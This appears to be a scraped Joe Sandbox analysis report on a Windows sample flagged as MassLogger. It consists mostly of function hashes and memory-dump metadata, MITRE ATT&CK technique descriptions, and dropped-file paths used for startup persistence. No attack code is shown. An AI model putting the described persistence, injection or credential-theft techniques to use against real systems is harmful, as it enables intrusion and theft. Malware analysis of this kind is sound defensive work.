Opcode Fuzzy Hash: bb28e6c9a7360e5e9e838ece8ea6e06c0263e2b54409eeaca7b2df7191d0cf9a
Instruction Fuzzy Hash: 111137758003489FDB24DFAAC845BDEBBF5EB48320F148419E515A7240CB79A541CBA4

Function 06C77FF0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98289ff29a673da47b4122d438c06caceca32aec7b66c98a4e30f1c5c31d83d9
Instruction ID: 19279198b818689fc8d65ac7532160b8da48bba00184262d01ca1fc86041bb5b
Opcode Fuzzy Hash: 98289ff29a673da47b4122d438c06caceca32aec7b66c98a4e30f1c5c31d83d9
Instruction Fuzzy Hash: E171F774E012188FEB54DFAAD458B9EBBB2FF98300F20816AD909A7355DB345D85CF90

Function 06C77FE1 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db24dc3170ce5a721160ad6eb04a948bdddfe2c8e4c7be02a8ce55e58eae7ce7
Instruction ID: 5b97498c1dde16e1a00f18e6ce85de5398c34d6a18ff3d2f4a2339f58c3d155a
Opcode Fuzzy Hash: db24dc3170ce5a721160ad6eb04a948bdddfe2c8e4c7be02a8ce55e58eae7ce7
Instruction Fuzzy Hash: E061F674E012188FEB54DFAAD45879EBBB2FF98300F20812AD919A7355DB345D85CF90

Function 06C78EF0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4d1018a5bee6a55b12dca037c06aadf6c100c0a789cd9b2860feaec14f7ad6
Instruction ID: 12d820426ec51cec5576d174be250953e9843c39384c43d20a509d603886cb66
Opcode Fuzzy Hash: cf4d1018a5bee6a55b12dca037c06aadf6c100c0a789cd9b2860feaec14f7ad6
Instruction Fuzzy Hash: D0412974E06209DFDB44CFAAD848AEDBBF2FB88310F10816AD528A7250D7755A41CF90

Function 06C7CE38 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d465c6732cb5c8c3b41611d8d23db85e63f95365aeb88f271c1cda5fa10f1d
Instruction ID: 278aea5571d049d8db5823c6a23c0d586a03edce89701e2450da7d4a26873661
Opcode Fuzzy Hash: 27d465c6732cb5c8c3b41611d8d23db85e63f95365aeb88f271c1cda5fa10f1d
Instruction Fuzzy Hash: A231F736705255AFE7145F69D880A6FBBA6EFC9350B14407EF905CB254DE718C11C3E0

Function 0145D030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1688086005.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_145d000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa7249fa04a36c504eed31b83deed55b888fb3ce50fe0462b37aa37ffd1740f
Instruction ID: f025b24fde91c94b478fffc407eebe78294f7ef5f20324952f9ee87a34223c5b
Opcode Fuzzy Hash: 5aa7249fa04a36c504eed31b83deed55b888fb3ce50fe0462b37aa37ffd1740f
Instruction Fuzzy Hash: 0621F1B2904200EFDB55EF54D984B27BB65EF84718F20856AED090B267C336D807CAA2

Function 06C7C6C0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4fa05407eceed9622a15025a9f5d5dfc7846a98d9153fbffbc12dc26bd552e
Instruction ID: 487fd5402b874e7004036ea066ffb2167a9fd9c4a263ccbd314633d52f9cc70e
Opcode Fuzzy Hash: 6a4fa05407eceed9622a15025a9f5d5dfc7846a98d9153fbffbc12dc26bd552e
Instruction Fuzzy Hash: B321F570A012029FD720AF7ED88479EB7F6EB89301F14842DE00ACB685EF7499068BD5

Function 0145D02B Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1688086005.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_145d000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c18627bb23b8aa195a81bcb52b80e316f21f73cf59983010e299ce781e20adbc
Instruction ID: 15637963134ed439a42a3323b99b9f4e512a87d16388e7df4018f748e1319d64
Opcode Fuzzy Hash: c18627bb23b8aa195a81bcb52b80e316f21f73cf59983010e299ce781e20adbc
Instruction Fuzzy Hash: 8B11AFB6904280DFDB16DF54DAC0B16BF61FB84714F24C5AADC090B657C336D41ACBA2

Function 06C79621 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97ef6562a464108ff745a51621f00691a8373f607f54c55b7c48c3b6391316d
Instruction ID: c1814e839e2184b9cbaee702b1454fd8bea45c4bf90e9f30d18e02a0883744c8
Opcode Fuzzy Hash: c97ef6562a464108ff745a51621f00691a8373f607f54c55b7c48c3b6391316d
Instruction Fuzzy Hash: 622117B0E02119CFEBA4DFA5D854BAEB7F2FB89305F0041A9D509AB664DB345E84CF40

Function 06C786B0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c679e23705da8701924395e8d395fb7253f26610f90082f8b4d65f8bf7c652c
Instruction ID: 7156d9b241638d4161be7aed5bd5b5fd45ee8542595c77cacaec5ffb60c820bd
Opcode Fuzzy Hash: 4c679e23705da8701924395e8d395fb7253f26610f90082f8b4d65f8bf7c652c
Instruction Fuzzy Hash: FF115336E00209DFCF04DFA8D4496EEBBF5EB88311F10417AD618A3380DB385A44CBA0

Function 06C786A0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3e340602a54065a44c72bd143ca21f384fd19c3b5090bc26b9fce4cdb75fc0
Instruction ID: f19759a9a7209a5793b605653be543cc984fc89870cb5386c52f0bb32f748437
Opcode Fuzzy Hash: 5c3e340602a54065a44c72bd143ca21f384fd19c3b5090bc26b9fce4cdb75fc0
Instruction Fuzzy Hash: 88118530E052499FCB01CBA8D4586EEBBB6EB88310F10416AD514A7390D7385A44CBA1

Function 06C777D7 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076ca69e1717818e0d868be7b211a17949eb19d9664a25b8b0b38b3e1a3d67ef
Instruction ID: 3424142e000834749d97f8a9d39ff476fec15052473fe6f4e28d2bd16659fc2d
Opcode Fuzzy Hash: 076ca69e1717818e0d868be7b211a17949eb19d9664a25b8b0b38b3e1a3d67ef
Instruction Fuzzy Hash: 8F110A74E0121CCFEB44CFAAE848B9DB7B2FB88304F01846AE92DA7254D7385981CF50

Function 06C77792 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91248bee5556d349b6c80d1acce7d0a205001170103b3db41661a0554469c76
Instruction ID: 90b33c8e7e148155da5b0651a3ba32703c8912f57bd75800384de10de8e6e370
Opcode Fuzzy Hash: a91248bee5556d349b6c80d1acce7d0a205001170103b3db41661a0554469c76
Instruction Fuzzy Hash: CF119E7490611CDFEF01CF5AE884B997BB2FB8A304F1140A6E429A7261D7385D91CF52

Function 06C797A6 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e1feb5e46d69c9186c8546301a2e4340016fd143cf596535511ac7d69fce07
Instruction ID: 84bfc8f5e80c08a40e3058cd44e8ca8f002cbf30239cd0ba5c8a6ebc39de9d09
Opcode Fuzzy Hash: d4e1feb5e46d69c9186c8546301a2e4340016fd143cf596535511ac7d69fce07
Instruction Fuzzy Hash: 84113078A02219CFD7A0DF25D85479DB7B2FBA8300F1041AAD909A7354DB385EC1CF81

Function 06C70FC0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4e91e869875bb1cd01cc5bf83aaccda29ff8e5961c542aabf1d61d1f240856
Instruction ID: c90f911e2eb521780a3cdf2d66c78ebccca9e94afaf19747c093b09168f2bf35
Opcode Fuzzy Hash: 4f4e91e869875bb1cd01cc5bf83aaccda29ff8e5961c542aabf1d61d1f240856
Instruction Fuzzy Hash: 55F03074E09208AFD751DFA5D8406ADBFF8EB49300F1481AAAC44D7392D7319A55CF91

Function 06C77F88 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e99286ebac683192f957e094744b1d024fe42a8d88c1d729fb199cb0ba55ac
Instruction ID: 467b848d3f9ecb2016592d1041673fb611a235bcb45d50253fed959116d5f75c
Opcode Fuzzy Hash: f8e99286ebac683192f957e094744b1d024fe42a8d88c1d729fb199cb0ba55ac
Instruction Fuzzy Hash: 9DF09A74909248EFCB91DFA9C88069DFBF5EF48300F20C09AEC88D3351DA318A41DBA1

Function 06C78780 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11ba4b2f489815202f85258356348bfa86e18b1ef25272eaa512ef2f51d2c32
Instruction ID: 6b1087e2b79d4fa8495f9b51ca96564fd9f504ff13e15ddfdaaf701d2c46f453
Opcode Fuzzy Hash: f11ba4b2f489815202f85258356348bfa86e18b1ef25272eaa512ef2f51d2c32
Instruction Fuzzy Hash: 36F03A74E09248EFC791DFA9D84569DBBF4EB49200F2082AAA849D3352E6355A41CB91

Function 06C78EA0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ab1344d02b69598ff9f4cab66441dc8c9fe47a3ff9fc3d6cee9d9e36158a791
Instruction ID: cd68c1c74fb7ed6a656b49e7405c19ae57ee6f6511dcfbb28db5bdb119f3c0e8
Opcode Fuzzy Hash: 8ab1344d02b69598ff9f4cab66441dc8c9fe47a3ff9fc3d6cee9d9e36158a791
Instruction Fuzzy Hash: FEF05E34D09208EFC7A5DFA9D59569DBBF4EB49300F2081EAD848D3351E7315A42CB91

Function 06C78651 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e8e78dc5ecffa774b70e8dea26ea671656a7e71de758224e498814925cdedc
Instruction ID: 871173c2263f9b196ca0979b3178980e823ed9dd0b5604c707d9a094e792284e
Opcode Fuzzy Hash: f9e8e78dc5ecffa774b70e8dea26ea671656a7e71de758224e498814925cdedc
Instruction Fuzzy Hash: 4CF03430909248EFCB94DFA9D8A4698BBF0EF49300F24C1AADC88D7352D2318B41DF81

Function 06C7EE30 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aac0238c8aa448e86ccafd8203c9599cd324d6ab40cf4e91b11e5c26b76a4f8
Instruction ID: 249e8d9c48314edc88ddc1e8f5a6c6efeb4a8a9eed8561e2ebe4a9a55f085744
Opcode Fuzzy Hash: 3aac0238c8aa448e86ccafd8203c9599cd324d6ab40cf4e91b11e5c26b76a4f8
Instruction Fuzzy Hash: 8AF0BE71E08688AFCB0ADB69D4887DCBFF6DB84312F0884DAD045DB292D7740A84C785

Function 06C796B2 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fde3dcdf45152e0572ec06aa0102e9740553649e716f480cc6f857144c1f3af
Instruction ID: c5a0e5e54c374d7b3d3dafbccdb1f0f463f01cd061e3233bc2af4c76561a6dc5
Opcode Fuzzy Hash: 1fde3dcdf45152e0572ec06aa0102e9740553649e716f480cc6f857144c1f3af
Instruction Fuzzy Hash: 0FF01D74901119CFEB84DF65E488B9CBBB2FB48301F10419AD609A7354C7785DC4CF51

Function 06C70FD0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76a1fe5c0cfdde6f8b2bc4bfb3f4d3c0c580b14b64ab4bf2e0fb102056645cb
Instruction ID: caf7ce534338799a9bd0d33d89eef4528dbeafce57b739dec81ab3263663993c
Opcode Fuzzy Hash: b76a1fe5c0cfdde6f8b2bc4bfb3f4d3c0c580b14b64ab4bf2e0fb102056645cb
Instruction Fuzzy Hash: 2EE0ED75E04208EFDB84DFA9D545A9CFBF5EB48310F10C1A9D81893351D6319A51DF84

Function 06C79E97 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67bca2d5d2b804b4c9b5cd25652af202b2235f04381278e146df1d5d5508fb7
Instruction ID: 08999bc3016c37745dba7af04a998da85ec8a0ed16e130652678f0eb0ffdad9b
Opcode Fuzzy Hash: a67bca2d5d2b804b4c9b5cd25652af202b2235f04381278e146df1d5d5508fb7
Instruction Fuzzy Hash: 91F09874A0421CCFDB68DF25D8917DDB7B2FB59300F10819A9A09A7354DB305E828F91

Function 06C79E3E Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dac6ecd606806f390867fc04465530372a673c4b09287d93ecee7ddf5919ec8
Instruction ID: fd3d293a7b509313edea4468a341d9ba249343bad6c0bba9501f40be1abb9cae
Opcode Fuzzy Hash: 6dac6ecd606806f390867fc04465530372a673c4b09287d93ecee7ddf5919ec8
Instruction Fuzzy Hash: 22E06530902118CFE750DF26E858BADBBBAFF99311F108199954AAB220CB351D81CF90

Function 06C7965C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba0b73db5bc8762afa1e3768eacbf64b1ca2c4765a4f73092cc8ef4fdb6faf7
Instruction ID: 520501624febe2f5fb35b9a573da3c23c8fee40838dc13603ab2f3527bc1e9e3
Opcode Fuzzy Hash: 7ba0b73db5bc8762afa1e3768eacbf64b1ca2c4765a4f73092cc8ef4fdb6faf7
Instruction Fuzzy Hash: E3E04674A412188FD794DFA1DAA479DB7B2FB98351F10009A860AAB350CB381DC0CF61

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 50201668.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

C:\Users\user\AppData\Roaming\Ticks.exe

C:\Users\user\AppData\Roaming\Ticks.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
50201668.exe

Function 06DD1FAB Relevance: 4.4, Strings: 2, Instructions: 1912
COMMON

